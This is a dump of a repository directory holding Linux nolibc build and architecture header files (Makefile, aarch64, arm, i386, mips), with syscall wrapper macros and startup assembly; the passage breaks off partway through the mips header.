15 | 16 | # OUTPUT is only set when run from the main makefile, otherwise 17 | # it defaults to this nolibc directory. 18 | OUTPUT ?= $(CURDIR)/ 19 | 20 | ifeq ($(V),1) 21 | Q= 22 | else 23 | Q=@ 24 | endif 25 | 26 | nolibc_arch := $(patsubst arm64,aarch64,$(ARCH)) 27 | arch_file := arch-$(nolibc_arch).h 28 | all_files := ctype.h errno.h nolibc.h signal.h std.h stdio.h stdlib.h string.h \ 29 | sys.h time.h types.h unistd.h 30 | 31 | # install all headers needed to support a bare-metal compiler 32 | all: headers 33 | 34 | install: help 35 | 36 | help: 37 | @echo "Supported targets under nolibc:" 38 | @echo " all call \"headers\"" 39 | @echo " clean clean the sysroot" 40 | @echo " headers prepare a sysroot in tools/include/nolibc/sysroot" 41 | @echo " headers_standalone like \"headers\", and also install kernel headers" 42 | @echo " help this help" 43 | @echo "" 44 | @echo "These targets may also be called from tools as \"make nolibc_\"." 45 | @echo "" 46 | @echo "Currently using the following variables:" 47 | @echo " ARCH = $(ARCH)" 48 | @echo " OUTPUT = $(OUTPUT)" 49 | @echo "" 50 | 51 | # Note: when ARCH is "x86" we concatenate both x86_64 and i386 52 | headers: 53 | $(Q)mkdir -p $(OUTPUT)sysroot 54 | $(Q)mkdir -p $(OUTPUT)sysroot/include 55 | $(Q)cp $(all_files) $(OUTPUT)sysroot/include/ 56 | $(Q)if [ "$(ARCH)" = "x86" ]; then \ 57 | sed -e \ 58 | 's,^#ifndef _NOLIBC_ARCH_X86_64_H,#if !defined(_NOLIBC_ARCH_X86_64_H) \&\& defined(__x86_64__),' \ 59 | arch-x86_64.h; \ 60 | sed -e \ 61 | 's,^#ifndef _NOLIBC_ARCH_I386_H,#if !defined(_NOLIBC_ARCH_I386_H) \&\& !defined(__x86_64__),' \ 62 | arch-i386.h; \ 63 | elif [ -e "$(arch_file)" ]; then \ 64 | cat $(arch_file); \ 65 | else \ 66 | echo "Fatal: architecture $(ARCH) not yet supported by nolibc." >&2; \ 67 | exit 1; \ 68 | fi > $(OUTPUT)sysroot/include/arch.h 69 | 70 | headers_standalone: headers 71 | $(Q)$(MAKE) -C $(srctree) headers 72 | $(Q)$(MAKE) -C $(srctree) headers_install INSTALL_HDR_PATH=$(OUTPUT)sysroot 73 | 74 | clean: 75 | $(call QUIET_CLEAN, nolibc) rm -rf "$(OUTPUT)sysroot" 76 | -------------------------------------------------------------------------------- /exp/nolibc/arch-aarch64.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * AARCH64 specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_AARCH64_H 8 | #define _NOLIBC_ARCH_AARCH64_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_CREAT 0x40 15 | #define O_EXCL 0x80 16 | #define O_NOCTTY 0x100 17 | #define O_TRUNC 0x200 18 | #define O_APPEND 0x400 19 | #define O_NONBLOCK 0x800 20 | #define O_DIRECTORY 0x4000 21 | 22 | /* The struct returned by the newfstatat() syscall. Differs slightly from the 23 | * x86_64's stat one by field ordering, so be careful. 24 | */ 25 | struct sys_stat_struct { 26 | unsigned long st_dev; 27 | unsigned long st_ino; 28 | unsigned int st_mode; 29 | unsigned int st_nlink; 30 | unsigned int st_uid; 31 | unsigned int st_gid; 32 | 33 | unsigned long st_rdev; 34 | unsigned long __pad1; 35 | long st_size; 36 | int st_blksize; 37 | int __pad2; 38 | 39 | long st_blocks; 40 | long st_atime; 41 | unsigned long st_atime_nsec; 42 | long st_mtime; 43 | 44 | unsigned long st_mtime_nsec; 45 | long st_ctime; 46 | unsigned long st_ctime_nsec; 47 | unsigned int __unused[2]; 48 | }; 49 | 50 | /* Syscalls for AARCH64 : 51 | * - registers are 64-bit 52 | * - stack is 16-byte aligned 53 | * - syscall number is passed in x8 54 | * - arguments are in x0, x1, x2, x3, x4, x5 55 | * - the system call is performed by calling svc 0 56 | * - syscall return comes in x0. 57 | * - the arguments are cast to long and assigned into the target registers 58 | * which are then simply passed as registers to the asm code, so that we 59 | * don't have to experience issues with register constraints. 60 | * 61 | * On aarch64, select() is not implemented so we have to use pselect6(). 62 | */ 63 | #define __ARCH_WANT_SYS_PSELECT6 64 | 65 | #define my_syscall0(num) \ 66 | ({ \ 67 | register long _num __asm__ ("x8") = (num); \ 68 | register long _arg1 __asm__ ("x0"); \ 69 | \ 70 | __asm__ volatile ( \ 71 | "svc #0\n" \ 72 | : "=r"(_arg1) \ 73 | : "r"(_num) \ 74 | : "memory", "cc" \ 75 | ); \ 76 | _arg1; \ 77 | }) 78 | 79 | #define my_syscall1(num, arg1) \ 80 | ({ \ 81 | register long _num __asm__ ("x8") = (num); \ 82 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 83 | \ 84 | __asm__ volatile ( \ 85 | "svc #0\n" \ 86 | : "=r"(_arg1) \ 87 | : "r"(_arg1), \ 88 | "r"(_num) \ 89 | : "memory", "cc" \ 90 | ); \ 91 | _arg1; \ 92 | }) 93 | 94 | #define my_syscall2(num, arg1, arg2) \ 95 | ({ \ 96 | register long _num __asm__ ("x8") = (num); \ 97 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 98 | register long _arg2 __asm__ ("x1") = (long)(arg2); \ 99 | \ 100 | __asm__ volatile ( \ 101 | "svc #0\n" \ 102 | : "=r"(_arg1) \ 103 | : "r"(_arg1), "r"(_arg2), \ 104 | "r"(_num) \ 105 | : "memory", "cc" \ 106 | ); \ 107 | _arg1; \ 108 | }) 109 | 110 | #define my_syscall3(num, arg1, arg2, arg3) \ 111 | ({ \ 112 | register long _num __asm__ ("x8") = (num); \ 113 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 114 | register long _arg2 __asm__ ("x1") = (long)(arg2); \ 115 | register long _arg3 __asm__ ("x2") = (long)(arg3); \ 116 | \ 117 | __asm__ volatile ( \ 118 | "svc #0\n" \ 119 | : "=r"(_arg1) \ 120 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), \ 121 | "r"(_num) \ 122 | : "memory", "cc" \ 123 | ); \ 124 | _arg1; \ 125 | }) 126 | 127 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 128 | ({ \ 129 | register long _num __asm__ ("x8") = (num); \ 130 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 131 | register long _arg2 __asm__ ("x1") = (long)(arg2); \ 132 | register long _arg3 __asm__ ("x2") = (long)(arg3); \ 133 | register long _arg4 __asm__ ("x3") = (long)(arg4); \ 134 | \ 135 | __asm__ volatile ( \ 136 | "svc #0\n" \ 137 | : "=r"(_arg1) \ 138 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), \ 139 | "r"(_num) \ 140 | : "memory", "cc" \ 141 | ); \ 142 | _arg1; \ 143 | }) 144 | 145 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 146 | ({ \ 147 | register long _num __asm__ ("x8") = (num); \ 148 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 149 | register long _arg2 __asm__ ("x1") = (long)(arg2); \ 150 | register long _arg3 __asm__ ("x2") = (long)(arg3); \ 151 | register long _arg4 __asm__ ("x3") = (long)(arg4); \ 152 | register long _arg5 __asm__ ("x4") = (long)(arg5); \ 153 | \ 154 | __asm__ volatile ( \ 155 | "svc #0\n" \ 156 | : "=r" (_arg1) \ 157 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 158 | "r"(_num) \ 159 | : "memory", "cc" \ 160 | ); \ 161 | _arg1; \ 162 | }) 163 | 164 | #define my_syscall6(num, arg1, arg2, arg3, arg4, arg5, arg6) \ 165 | ({ \ 166 | register long _num __asm__ ("x8") = (num); \ 167 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 168 | register long _arg2 __asm__ ("x1") = (long)(arg2); \ 169 | register long _arg3 __asm__ ("x2") = (long)(arg3); \ 170 | register long _arg4 __asm__ ("x3") = (long)(arg4); \ 171 | register long _arg5 __asm__ ("x4") = (long)(arg5); \ 172 | register long _arg6 __asm__ ("x5") = (long)(arg6); \ 173 | \ 174 | __asm__ volatile ( \ 175 | "svc #0\n" \ 176 | : "=r" (_arg1) \ 177 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 178 | "r"(_arg6), "r"(_num) \ 179 | : "memory", "cc" \ 180 | ); \ 181 | _arg1; \ 182 | }) 183 | 184 | /* startup code */ 185 | __asm__ (".section .text\n" 186 | ".weak _start\n" 187 | "_start:\n" 188 | "ldr x0, [sp]\n" // argc (x0) was in the stack 189 | "add x1, sp, 8\n" // argv (x1) = sp 190 | "lsl x2, x0, 3\n" // envp (x2) = 8*argc ... 191 | "add x2, x2, 8\n" // + 8 (skip null) 192 | "add x2, x2, x1\n" // + argv 193 | "and sp, x1, -16\n" // sp must be 16-byte aligned in the callee 194 | "bl main\n" // main() returns the status code, we'll exit with it. 195 | "mov x8, 93\n" // NR_exit == 93 196 | "svc #0\n" 197 | ""); 198 | 199 | #endif // _NOLIBC_ARCH_AARCH64_H 200 | -------------------------------------------------------------------------------- /exp/nolibc/arch-arm.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * ARM specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_ARM_H 8 | #define _NOLIBC_ARCH_ARM_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_CREAT 0x40 15 | #define O_EXCL 0x80 16 | #define O_NOCTTY 0x100 17 | #define O_TRUNC 0x200 18 | #define O_APPEND 0x400 19 | #define O_NONBLOCK 0x800 20 | #define O_DIRECTORY 0x4000 21 | 22 | /* The struct returned by the stat() syscall, 32-bit only, the syscall returns 23 | * exactly 56 bytes (stops before the unused array). In big endian, the format 24 | * differs as devices are returned as short only. 25 | */ 26 | struct sys_stat_struct { 27 | #if defined(__ARMEB__) 28 | unsigned short st_dev; 29 | unsigned short __pad1; 30 | #else 31 | unsigned long st_dev; 32 | #endif 33 | unsigned long st_ino; 34 | unsigned short st_mode; 35 | unsigned short st_nlink; 36 | unsigned short st_uid; 37 | unsigned short st_gid; 38 | 39 | #if defined(__ARMEB__) 40 | unsigned short st_rdev; 41 | unsigned short __pad2; 42 | #else 43 | unsigned long st_rdev; 44 | #endif 45 | unsigned long st_size; 46 | unsigned long st_blksize; 47 | unsigned long st_blocks; 48 | 49 | unsigned long st_atime; 50 | unsigned long st_atime_nsec; 51 | unsigned long st_mtime; 52 | unsigned long st_mtime_nsec; 53 | 54 | unsigned long st_ctime; 55 | unsigned long st_ctime_nsec; 56 | unsigned long __unused[2]; 57 | }; 58 | 59 | /* Syscalls for ARM in ARM or Thumb modes : 60 | * - registers are 32-bit 61 | * - stack is 8-byte aligned 62 | * ( http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.faqs/ka4127.html) 63 | * - syscall number is passed in r7 64 | * - arguments are in r0, r1, r2, r3, r4, r5 65 | * - the system call is performed by calling svc #0 66 | * - syscall return comes in r0. 67 | * - only lr is clobbered. 68 | * - the arguments are cast to long and assigned into the target registers 69 | * which are then simply passed as registers to the asm code, so that we 70 | * don't have to experience issues with register constraints. 71 | * - the syscall number is always specified last in order to allow to force 72 | * some registers before (gcc refuses a %-register at the last position). 73 | * 74 | * Also, ARM supports the old_select syscall if newselect is not available 75 | */ 76 | #define __ARCH_WANT_SYS_OLD_SELECT 77 | 78 | #define my_syscall0(num) \ 79 | ({ \ 80 | register long _num __asm__ ("r7") = (num); \ 81 | register long _arg1 __asm__ ("r0"); \ 82 | \ 83 | __asm__ volatile ( \ 84 | "svc #0\n" \ 85 | : "=r"(_arg1) \ 86 | : "r"(_num) \ 87 | : "memory", "cc", "lr" \ 88 | ); \ 89 | _arg1; \ 90 | }) 91 | 92 | #define my_syscall1(num, arg1) \ 93 | ({ \ 94 | register long _num __asm__ ("r7") = (num); \ 95 | register long _arg1 __asm__ ("r0") = (long)(arg1); \ 96 | \ 97 | __asm__ volatile ( \ 98 | "svc #0\n" \ 99 | : "=r"(_arg1) \ 100 | : "r"(_arg1), \ 101 | "r"(_num) \ 102 | : "memory", "cc", "lr" \ 103 | ); \ 104 | _arg1; \ 105 | }) 106 | 107 | #define my_syscall2(num, arg1, arg2) \ 108 | ({ \ 109 | register long _num __asm__ ("r7") = (num); \ 110 | register long _arg1 __asm__ ("r0") = (long)(arg1); \ 111 | register long _arg2 __asm__ ("r1") = (long)(arg2); \ 112 | \ 113 | __asm__ volatile ( \ 114 | "svc #0\n" \ 115 | : "=r"(_arg1) \ 116 | : "r"(_arg1), "r"(_arg2), \ 117 | "r"(_num) \ 118 | : "memory", "cc", "lr" \ 119 | ); \ 120 | _arg1; \ 121 | }) 122 | 123 | #define my_syscall3(num, arg1, arg2, arg3) \ 124 | ({ \ 125 | register long _num __asm__ ("r7") = (num); \ 126 | register long _arg1 __asm__ ("r0") = (long)(arg1); \ 127 | register long _arg2 __asm__ ("r1") = (long)(arg2); \ 128 | register long _arg3 __asm__ ("r2") = (long)(arg3); \ 129 | \ 130 | __asm__ volatile ( \ 131 | "svc #0\n" \ 132 | : "=r"(_arg1) \ 133 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), \ 134 | "r"(_num) \ 135 | : "memory", "cc", "lr" \ 136 | ); \ 137 | _arg1; \ 138 | }) 139 | 140 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 141 | ({ \ 142 | register long _num __asm__ ("r7") = (num); \ 143 | register long _arg1 __asm__ ("r0") = (long)(arg1); \ 144 | register long _arg2 __asm__ ("r1") = (long)(arg2); \ 145 | register long _arg3 __asm__ ("r2") = (long)(arg3); \ 146 | register long _arg4 __asm__ ("r3") = (long)(arg4); \ 147 | \ 148 | __asm__ volatile ( \ 149 | "svc #0\n" \ 150 | : "=r"(_arg1) \ 151 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), \ 152 | "r"(_num) \ 153 | : "memory", "cc", "lr" \ 154 | ); \ 155 | _arg1; \ 156 | }) 157 | 158 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 159 | ({ \ 160 | register long _num __asm__ ("r7") = (num); \ 161 | register long _arg1 __asm__ ("r0") = (long)(arg1); \ 162 | register long _arg2 __asm__ ("r1") = (long)(arg2); \ 163 | register long _arg3 __asm__ ("r2") = (long)(arg3); \ 164 | register long _arg4 __asm__ ("r3") = (long)(arg4); \ 165 | register long _arg5 __asm__ ("r4") = (long)(arg5); \ 166 | \ 167 | __asm__ volatile ( \ 168 | "svc #0\n" \ 169 | : "=r" (_arg1) \ 170 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 171 | "r"(_num) \ 172 | : "memory", "cc", "lr" \ 173 | ); \ 174 | _arg1; \ 175 | }) 176 | 177 | /* startup code */ 178 | __asm__ (".section .text\n" 179 | ".weak _start\n" 180 | "_start:\n" 181 | #if defined(__THUMBEB__) || defined(__THUMBEL__) 182 | /* We enter here in 32-bit mode but if some previous functions were in 183 | * 16-bit mode, the assembler cannot know, so we need to tell it we're in 184 | * 32-bit now, then switch to 16-bit (is there a better way to do it than 185 | * adding 1 by hand ?) and tell the asm we're now in 16-bit mode so that 186 | * it generates correct instructions. Note that we do not support thumb1. 187 | */ 188 | ".code 32\n" 189 | "add r0, pc, #1\n" 190 | "bx r0\n" 191 | ".code 16\n" 192 | #endif 193 | "pop {%r0}\n" // argc was in the stack 194 | "mov %r1, %sp\n" // argv = sp 195 | "add %r2, %r1, %r0, lsl #2\n" // envp = argv + 4*argc ... 196 | "add %r2, %r2, $4\n" // ... + 4 197 | "and %r3, %r1, $-8\n" // AAPCS : sp must be 8-byte aligned in the 198 | "mov %sp, %r3\n" // callee, an bl doesn't push (lr=pc) 199 | "bl main\n" // main() returns the status code, we'll exit with it. 200 | "movs r7, $1\n" // NR_exit == 1 201 | "svc $0x00\n" 202 | ""); 203 | 204 | #endif // _NOLIBC_ARCH_ARM_H 205 | -------------------------------------------------------------------------------- /exp/nolibc/arch-i386.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * i386 specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_I386_H 8 | #define _NOLIBC_ARCH_I386_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_CREAT 0x40 15 | #define O_EXCL 0x80 16 | #define O_NOCTTY 0x100 17 | #define O_TRUNC 0x200 18 | #define O_APPEND 0x400 19 | #define O_NONBLOCK 0x800 20 | #define O_DIRECTORY 0x10000 21 | 22 | /* The struct returned by the stat() syscall, 32-bit only, the syscall returns 23 | * exactly 56 bytes (stops before the unused array). 24 | */ 25 | struct sys_stat_struct { 26 | unsigned long st_dev; 27 | unsigned long st_ino; 28 | unsigned short st_mode; 29 | unsigned short st_nlink; 30 | unsigned short st_uid; 31 | unsigned short st_gid; 32 | 33 | unsigned long st_rdev; 34 | unsigned long st_size; 35 | unsigned long st_blksize; 36 | unsigned long st_blocks; 37 | 38 | unsigned long st_atime; 39 | unsigned long st_atime_nsec; 40 | unsigned long st_mtime; 41 | unsigned long st_mtime_nsec; 42 | 43 | unsigned long st_ctime; 44 | unsigned long st_ctime_nsec; 45 | unsigned long __unused[2]; 46 | }; 47 | 48 | /* Syscalls for i386 : 49 | * - mostly similar to x86_64 50 | * - registers are 32-bit 51 | * - syscall number is passed in eax 52 | * - arguments are in ebx, ecx, edx, esi, edi, ebp respectively 53 | * - all registers are preserved (except eax of course) 54 | * - the system call is performed by calling int $0x80 55 | * - syscall return comes in eax 56 | * - the arguments are cast to long and assigned into the target registers 57 | * which are then simply passed as registers to the asm code, so that we 58 | * don't have to experience issues with register constraints. 59 | * - the syscall number is always specified last in order to allow to force 60 | * some registers before (gcc refuses a %-register at the last position). 61 | * 62 | * Also, i386 supports the old_select syscall if newselect is not available 63 | */ 64 | #define __ARCH_WANT_SYS_OLD_SELECT 65 | 66 | #define my_syscall0(num) \ 67 | ({ \ 68 | long _ret; \ 69 | register long _num __asm__ ("eax") = (num); \ 70 | \ 71 | __asm__ volatile ( \ 72 | "int $0x80\n" \ 73 | : "=a" (_ret) \ 74 | : "0"(_num) \ 75 | : "memory", "cc" \ 76 | ); \ 77 | _ret; \ 78 | }) 79 | 80 | #define my_syscall1(num, arg1) \ 81 | ({ \ 82 | long _ret; \ 83 | register long _num __asm__ ("eax") = (num); \ 84 | register long _arg1 __asm__ ("ebx") = (long)(arg1); \ 85 | \ 86 | __asm__ volatile ( \ 87 | "int $0x80\n" \ 88 | : "=a" (_ret) \ 89 | : "r"(_arg1), \ 90 | "0"(_num) \ 91 | : "memory", "cc" \ 92 | ); \ 93 | _ret; \ 94 | }) 95 | 96 | #define my_syscall2(num, arg1, arg2) \ 97 | ({ \ 98 | long _ret; \ 99 | register long _num __asm__ ("eax") = (num); \ 100 | register long _arg1 __asm__ ("ebx") = (long)(arg1); \ 101 | register long _arg2 __asm__ ("ecx") = (long)(arg2); \ 102 | \ 103 | __asm__ volatile ( \ 104 | "int $0x80\n" \ 105 | : "=a" (_ret) \ 106 | : "r"(_arg1), "r"(_arg2), \ 107 | "0"(_num) \ 108 | : "memory", "cc" \ 109 | ); \ 110 | _ret; \ 111 | }) 112 | 113 | #define my_syscall3(num, arg1, arg2, arg3) \ 114 | ({ \ 115 | long _ret; \ 116 | register long _num __asm__ ("eax") = (num); \ 117 | register long _arg1 __asm__ ("ebx") = (long)(arg1); \ 118 | register long _arg2 __asm__ ("ecx") = (long)(arg2); \ 119 | register long _arg3 __asm__ ("edx") = (long)(arg3); \ 120 | \ 121 | __asm__ volatile ( \ 122 | "int $0x80\n" \ 123 | : "=a" (_ret) \ 124 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), \ 125 | "0"(_num) \ 126 | : "memory", "cc" \ 127 | ); \ 128 | _ret; \ 129 | }) 130 | 131 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 132 | ({ \ 133 | long _ret; \ 134 | register long _num __asm__ ("eax") = (num); \ 135 | register long _arg1 __asm__ ("ebx") = (long)(arg1); \ 136 | register long _arg2 __asm__ ("ecx") = (long)(arg2); \ 137 | register long _arg3 __asm__ ("edx") = (long)(arg3); \ 138 | register long _arg4 __asm__ ("esi") = (long)(arg4); \ 139 | \ 140 | __asm__ volatile ( \ 141 | "int $0x80\n" \ 142 | : "=a" (_ret) \ 143 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), \ 144 | "0"(_num) \ 145 | : "memory", "cc" \ 146 | ); \ 147 | _ret; \ 148 | }) 149 | 150 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 151 | ({ \ 152 | long _ret; \ 153 | register long _num __asm__ ("eax") = (num); \ 154 | register long _arg1 __asm__ ("ebx") = (long)(arg1); \ 155 | register long _arg2 __asm__ ("ecx") = (long)(arg2); \ 156 | register long _arg3 __asm__ ("edx") = (long)(arg3); \ 157 | register long _arg4 __asm__ ("esi") = (long)(arg4); \ 158 | register long _arg5 __asm__ ("edi") = (long)(arg5); \ 159 | \ 160 | __asm__ volatile ( \ 161 | "int $0x80\n" \ 162 | : "=a" (_ret) \ 163 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 164 | "0"(_num) \ 165 | : "memory", "cc" \ 166 | ); \ 167 | _ret; \ 168 | }) 169 | 170 | #define my_syscall6(num, arg1, arg2, arg3, arg4, arg5, arg6) \ 171 | ({ \ 172 | long _eax = (long)(num); \ 173 | long _arg6 = (long)(arg6); /* Always in memory */ \ 174 | __asm__ volatile ( \ 175 | "pushl %[_arg6]\n\t" \ 176 | "pushl %%ebp\n\t" \ 177 | "movl 4(%%esp),%%ebp\n\t" \ 178 | "int $0x80\n\t" \ 179 | "popl %%ebp\n\t" \ 180 | "addl $4,%%esp\n\t" \ 181 | : "+a"(_eax) /* %eax */ \ 182 | : "b"(arg1), /* %ebx */ \ 183 | "c"(arg2), /* %ecx */ \ 184 | "d"(arg3), /* %edx */ \ 185 | "S"(arg4), /* %esi */ \ 186 | "D"(arg5), /* %edi */ \ 187 | [_arg6]"m"(_arg6) /* memory */ \ 188 | : "memory", "cc" \ 189 | ); \ 190 | _eax; \ 191 | }) 192 | 193 | /* startup code */ 194 | /* 195 | * i386 System V ABI mandates: 196 | * 1) last pushed argument must be 16-byte aligned. 197 | * 2) The deepest stack frame should be set to zero 198 | * 199 | */ 200 | __asm__ (".section .text\n" 201 | ".weak _start\n" 202 | "_start:\n" 203 | "pop %eax\n" // argc (first arg, %eax) 204 | "mov %esp, %ebx\n" // argv[] (second arg, %ebx) 205 | "lea 4(%ebx,%eax,4),%ecx\n" // then a NULL then envp (third arg, %ecx) 206 | "xor %ebp, %ebp\n" // zero the stack frame 207 | "and $-16, %esp\n" // x86 ABI : esp must be 16-byte aligned before 208 | "sub $4, %esp\n" // the call instruction (args are aligned) 209 | "push %ecx\n" // push all registers on the stack so that we 210 | "push %ebx\n" // support both regparm and plain stack modes 211 | "push %eax\n" 212 | "call main\n" // main() returns the status code in %eax 213 | "mov %eax, %ebx\n" // retrieve exit code (32-bit int) 214 | "movl $1, %eax\n" // NR_exit == 1 215 | "int $0x80\n" // exit now 216 | "hlt\n" // ensure it does not 217 | ""); 218 | 219 | #endif // _NOLIBC_ARCH_I386_H 220 | -------------------------------------------------------------------------------- /exp/nolibc/arch-mips.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * MIPS specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_MIPS_H 8 | #define _NOLIBC_ARCH_MIPS_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_APPEND 0x0008 15 | #define O_NONBLOCK 0x0080 16 | #define O_CREAT 0x0100 17 | #define O_TRUNC 0x0200 18 | #define O_EXCL 0x0400 19 | #define O_NOCTTY 0x0800 20 | #define O_DIRECTORY 0x10000 21 | 22 | /* The struct returned by the stat() syscall. 88 bytes are returned by the 23 | * syscall. 24 | */ 25 | struct sys_stat_struct { 26 | unsigned int st_dev; 27 | long st_pad1[3]; 28 | unsigned long st_ino; 29 | unsigned int st_mode; 30 | unsigned int st_nlink; 31 | unsigned int st_uid; 32 | unsigned int st_gid; 33 | unsigned int st_rdev; 34 | long st_pad2[2]; 35 | long st_size; 36 | long st_pad3; 37 | 38 | long st_atime; 39 | long st_atime_nsec; 40 | long st_mtime; 41 | long st_mtime_nsec; 42 | 43 | long st_ctime; 44 | long st_ctime_nsec; 45 | long st_blksize; 46 | long st_blocks; 47 | long st_pad4[14]; 48 | }; 49 | 50 | /* Syscalls for MIPS ABI O32 : 51 | * - WARNING! there's always a delayed slot! 52 | * - WARNING again, the syntax is different, registers take a '$' and numbers 53 | * do not. 54 | * - registers are 32-bit 55 | * - stack is 8-byte aligned 56 | * - syscall number is passed in v0 (starts at 0xfa0). 57 | * - arguments are in a0, a1, a2, a3, then the stack. The caller needs to 58 | * leave some room in the stack for the callee to save a0..a3 if needed. 59 | * - Many registers are clobbered, in fact only a0..a2 and s0..s8 are 60 | * preserved. See: https://www.linux-mips.org/wiki/Syscall as well as 61 | * scall32-o32.S in the kernel sources. 62 | * - the system call is performed by calling "syscall" 63 | * - syscall return comes in v0, and register a3 needs to be checked to know 64 | * if an error occurred, in which case errno is in v0. 65 | * - the arguments are cast to long and assigned into the target registers 66 | * which are then simply passed as registers to the asm code, so that we 67 | * don't have to experience issues with register constraints. 68 | */ 69 | 70 | #define my_syscall0(num) \ 71 | ({ \ 72 | register long _num __asm__ ("v0") = (num); \ 73 | register long _arg4 __asm__ ("a3"); \ 74 | \ 75 | __asm__ volatile ( \ 76 | "addiu $sp, $sp, -32\n" \ 77 | "syscall\n" \ 78 | "addiu $sp, $sp, 32\n" \ 79 | : "=r"(_num), "=r"(_arg4) \ 80 | : "r"(_num) \ 81 | : "memory", "cc", "at", "v1", "hi", "lo", \ 82 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 83 | ); \ 84 | _arg4 ? -_num : _num; \ 85 | }) 86 | 87 | #define my_syscall1(num, arg1) \ 88 | ({ \ 89 | register long _num __asm__ ("v0") = (num); \ 90 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 91 | register long _arg4 __asm__ ("a3"); \ 92 | \ 93 | __asm__ volatile ( \ 94 | "addiu $sp, $sp, -32\n" \ 95 | "syscall\n" \ 96 | "addiu $sp, $sp, 32\n" \ 97 | : "=r"(_num), "=r"(_arg4) \ 98 | : "0"(_num), \ 99 | "r"(_arg1) \ 100 | : "memory", "cc", "at", "v1", "hi", "lo", \ 101 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 102 | ); \ 103 | _arg4 ? -_num : _num; \ 104 | }) 105 | 106 | #define my_syscall2(num, arg1, arg2) \ 107 | ({ \ 108 | register long _num __asm__ ("v0") = (num); \ 109 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 110 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 111 | register long _arg4 __asm__ ("a3"); \ 112 | \ 113 | __asm__ volatile ( \ 114 | "addiu $sp, $sp, -32\n" \ 115 | "syscall\n" \ 116 | "addiu $sp, $sp, 32\n" \ 117 | : "=r"(_num), "=r"(_arg4) \ 118 | : "0"(_num), \ 119 | "r"(_arg1), "r"(_arg2) \ 120 | : "memory", "cc", "at", "v1", "hi", "lo", \ 121 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 122 | ); \ 123 | _arg4 ? -_num : _num; \ 124 | }) 125 | 126 | #define my_syscall3(num, arg1, arg2, arg3) \ 127 | ({ \ 128 | register long _num __asm__ ("v0") = (num); \ 129 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 130 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 131 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 132 | register long _arg4 __asm__ ("a3"); \ 133 | \ 134 | __asm__ volatile ( \ 135 | "addiu $sp, $sp, -32\n" \ 136 | "syscall\n" \ 137 | "addiu $sp, $sp, 32\n" \ 138 | : "=r"(_num), "=r"(_arg4) \ 139 | : "0"(_num), \ 140 | "r"(_arg1), "r"(_arg2), "r"(_arg3) \ 141 | : "memory", "cc", "at", "v1", "hi", "lo", \ 142 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 143 | ); \ 144 | _arg4 ? -_num : _num; \ 145 | }) 146 | 147 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 148 | ({ \ 149 | register long _num __asm__ ("v0") = (num); \ 150 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 151 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 152 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 153 | register long _arg4 __asm__ ("a3") = (long)(arg4); 